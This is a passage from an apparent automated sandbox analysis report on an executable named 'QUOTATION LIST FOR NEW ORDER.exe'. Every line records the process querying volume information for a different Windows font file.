          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\QUOTATION LIST FOR NEW ORDER.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
